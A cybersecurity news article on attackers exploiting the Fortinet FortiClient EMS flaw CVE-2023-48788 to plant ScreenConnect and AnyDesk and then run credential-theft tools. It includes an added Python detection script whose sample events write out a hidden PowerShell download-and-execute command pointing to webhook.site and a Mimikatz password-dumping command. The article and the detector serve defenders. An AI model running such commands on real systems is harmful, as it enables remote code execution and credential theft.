A now-patched critical security flaw affecting Fortinet FortiClient EMS is being exploited by malicious actors as part of a cyber campaign that installed remote desktop software such as AnyDesk and ScreenConnect.
The vulnerability in question is CVE-2023-48788 (CVSS score: 9.3), an SQL injection bug that allows attackers to execute unauthorized code or commands by sending specially crafted data packets.
Russian cybersecurity company Kaspersky said the October 2024 attack targeted an unnamed company's Windows server that was exposed to the internet and had two open ports associated with FortiClient EMS.
"The targeted company employs this technology to allow employees to download specific policies to their corporate devices, granting them secure access to the Fortinet VPN," it said in a Thursday analysis.
Further analysis of the incident found that the threat actors used CVE-2023-48788 as the initial access vector, subsequently dropping a ScreenConnect executable to obtain remote access to the compromised host.
"After the initial installation, the attackers began to upload additional payloads to the compromised system, to begin discovery and lateral movement activities, such as enumerating network resources, trying to obtain credentials, perform defense evasion techniques, and generating a further type of persistence via the AnyDesk remote control tool," Kaspersky said.
Some of the other notable tools dropped over the course of the attack are listed below -
- webbrowserpassview.exe, a password recovery tool that reveals passwords stored in Internet Explorer (version 4.0 – 11.0), Mozilla Firefox (all versions), Google Chrome, Safari, and Opera
- Mimikatz
- netpass64.exe, a password recovery tool
- netscan.exe, a network scanner
The threat actors behind the campaign are believed to have targeted various companies located across Brazil, Croatia, France, India, Indonesia, Mongolia, Namibia, Peru, Spain, Switzerland, Turkey, and the U.A.E. by making use of different ScreenConnect subdomains (e.g., infinity.screenconnect[.]com).
Kaspersky said it detected further attempts to weaponize CVE-2023-48788 on October 23, 2024, this time to execute a PowerShell script hosted on a webhook[.]site domain in order to "collect responses from vulnerable targets" during a scan of a system susceptible to the flaw.
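The tool list, the ScreenConnect subdomains and the webhook[.]site PowerShell download described above translate directly into a hunting rule. The following is an added example, not code from Kaspersky, Fortinet or the original article: it runs over constructed, Sysmon-like process-creation and network-connection events and flags the named credential tools, the scanner, the two remote-access tools and connections to the abused domains. The event layout, the sample telemetry and the AnyDesk/ScreenConnect client binary names are assumptions.

```python
"""
Hunt for the post-exploitation tooling named in the Kaspersky write-up
across process-creation and network-connection telemetry. Added example,
not code from Kaspersky, Fortinet or the original article. The event
layout is a constructed, Sysmon-like subset; the AnyDesk and ScreenConnect
client binary names are assumptions.
"""
import re
from dataclasses import dataclass

# Tool names as listed in the article. Mimikatz is routinely renamed, so its
# module syntax on the command line is matched as well.
CREDENTIAL_TOOLS = {"webbrowserpassview.exe", "netpass64.exe", "mimikatz.exe"}
SCANNERS = {"netscan.exe"}
MIMIKATZ_ARGS = re.compile(r"sekurlsa::|lsadump::|privilege::debug", re.I)
# Assumed binary names for the two remote-access tools.
RAT_BINARIES = {"anydesk.exe", "screenconnect.clientservice.exe",
                "screenconnect.windowsclient.exe"}
# Both are legitimate services that the campaign abused: a hit is a lead to
# triage, not a verdict.
SUSPECT_DOMAINS = ("screenconnect.com", "webhook.site")


@dataclass
class Event:
    kind: str          # "process" (creation) or "network" (outbound connect)
    host: str
    image: str = ""    # full path of the created / connecting process
    cmdline: str = ""
    dest: str = ""     # destination hostname (network events only)


@dataclass
class Finding:
    host: str
    rule: str
    evidence: str


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def domain_matches(name, suffix):
    """True for suffix itself or any subdomain of it (e.g. infinity.screenconnect.com)."""
    name = name.lower().rstrip(".")
    return name == suffix or name.endswith("." + suffix)


def hunt(events):
    findings = []
    for ev in events:
        img = _basename(ev.image)
        if ev.kind == "process":
            if img in CREDENTIAL_TOOLS or MIMIKATZ_ARGS.search(ev.cmdline):
                findings.append(Finding(ev.host, "credential-dumping-tool",
                                        ev.cmdline or ev.image))
            elif img in SCANNERS:
                findings.append(Finding(ev.host, "network-scanner", ev.image))
            elif img in RAT_BINARIES:
                findings.append(Finding(ev.host, "remote-access-tool", ev.image))
            # PowerShell pulling a script from webhook[.]site (the October 23 activity).
            if img in {"powershell.exe", "pwsh.exe"} and "webhook.site" in ev.cmdline.lower():
                findings.append(Finding(ev.host, "remote-script-download", ev.cmdline))
        elif ev.kind == "network":
            for suffix in SUSPECT_DOMAINS:
                if domain_matches(ev.dest, suffix):
                    findings.append(Finding(ev.host, "remote-access-domain",
                                            f"{img} -> {ev.dest}"))
    return findings


def rules_fired(events):
    return sorted({f.rule for f in hunt(events)})


# Constructed sample telemetry from a hypothetical EMS host; not real logs.
SAMPLE_EVENTS = [
    Event("process", "ems-srv01", image=r"C:\Windows\Temp\ScreenConnect.ClientService.exe"),
    Event("network", "ems-srv01", image=r"C:\Windows\Temp\ScreenConnect.ClientService.exe",
          dest="infinity.screenconnect.com"),
    Event("process", "ems-srv01", image=r"C:\Users\Public\webbrowserpassview.exe"),
    Event("process", "ems-srv01", image=r"C:\Users\Public\m.exe",   # renamed Mimikatz
          cmdline="m.exe privilege::debug sekurlsa::logonpasswords exit"),
    Event("process", "ems-srv01", image=r"C:\Users\Public\netscan.exe"),
    Event("process", "ems-srv01", image=r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe"),
    Event("process", "ems-srv01",
          image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline="powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient)"
                  ".DownloadString('https://webhook.site/00000000-0000-0000-0000-000000000000'))"),
    Event("process", "ems-srv01", image=r"C:\Windows\System32\svchost.exe"),   # benign
    Event("network", "ems-srv01", image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          dest="www.fortinet.com"),                                            # benign
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host}  {f.rule:25}  {f.evidence}")
```

Start with the internet-exposed FortiClient EMS host itself, since that is where the chain begins, and treat `remote-access-domain` hits as triage leads: ScreenConnect and AnyDesk are widely used by legitimate help desks, so the signal is a remote-access client appearing on a server that never had one, close in time to the credential and scanning tools above.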
The disclosure comes more than eight months after cybersecurity company Forescout uncovered a similar campaign that involved exploiting CVE-2023-48788 to deliver ScreenConnect and Metasploit Powerfun payloads.
"The analysis of this incident helped us to establish that the techniques currently used by the attackers to deploy remote access tools are constantly being updated and growing in complexity," the researchers said.